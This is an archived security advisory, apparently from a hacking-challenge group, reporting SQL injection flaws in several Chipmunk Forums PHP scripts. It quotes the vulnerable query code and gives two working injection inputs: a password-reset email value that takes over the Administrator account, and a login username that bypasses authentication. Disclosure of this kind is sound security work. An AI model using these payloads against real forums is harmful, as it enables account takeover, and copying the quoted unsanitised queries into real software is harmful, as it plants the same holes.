TUCoPS :: Web BBS :: etc

TUCoPS :: Web BBS :: etc :: hack7225.htm
Chipmunk Forums SQL injection

SQL injection in Chipmunk forums /*==========================================*/ // GHC -> Chipmunk forum <- ADVISORY // Product: Chipmunk Forums // URL: http://www.chipmunk-scripts.com/board // VULNERABILITY CLASS: SQL injection // RISK: hight /*==========================================*/ [1] script name: getpassword.php ---[code]--- if(isset($_POST['submit'])) { $email=$_POST['email']; $getinfo="SELECT * from b_users where email='$email'"; ... mail("$email","Your Forum password","Your forum password has been set to $value"); ---[/code]--- [exploit] ghc@ghc.ru' or username='Administrator this action will change password for Administrator without notification [note] "Administrator" must be a valid user name. [2] script name: authenticate.php ---[code]--- $username=$_POST['user']; $password=$_POST['password']; $password=md5($password); $query = "select * from b_users where username='$username' and password='$password' and validated='1'"; ---[/code]--- [exploit] at login.php enter user name as Administrator'/* [3] script name: edit.php ---[code]--- if(isset($_POST['ID'])) { $ID=$_POST['ID']; } else { $ID=$_GET['ID']; } $checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author and b_posts.ID='$ID'"; ---[code]--- Possible SQL injection through $ID variable. [4] search.php ---[code]--- $searchterm=$_POST['searchterm']; $getthreads="SELECT * from b_posts where post like '%$searchterm%' and threadparent='0' order by telapsed DESC limit $start, 50"; ---[/code]--- Possible SQL injection through $searchterm. [5] newtopic.php ---[code]--- $name=$_POST['name']; $title=$_POST['title']; $post=$_POST['post']; $day=date("D M d, Y H:i:s"); $timegone=date("U") ; if($_POST['nosmiley']) ... $name=strip_tags($name); $title=strip_tags($title); $post=strip_tags($post); $posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', '$day', '$timegone','$forumID','$user','$nosmiley','$s')"; mysql_query($posting) or die("could not post"); ---[/code]--- Possible SQL injection through $name, $title, $post. [6] reguser.php ---[code 1]--- $username=$_POST['username']; $password=$_POST['password']; $signature=$_POST['signature']; $pass2=$_POST['pass2']; $usercheck="SELECT*from b_users where username='$username' or email='$email'"; ---[code 2]--- if ($password==$pass2 && $_POST['password']) { ... $SQL ="INSERT into b_users (username,password,sig, email,location,AIM,ICQ,showprofile,validated) values ('$username','$password','$signature','$email','$location','$aim','$icq','$showprofile','1') "; mysql_query($SQL) or die(mysql_error()); ---[/code]--- Possible SQL injection through registration form's variables. Find a lot of bugs in usercp.php, reply.php, quote.php and others by yourself. /* ================================================== */ /* www.ghc.ru -- security games & challenges */ /* ================================================== */ /* greets to: RST.void.ru, D0G4 & all quest hunters %)*/ /* ================================================== */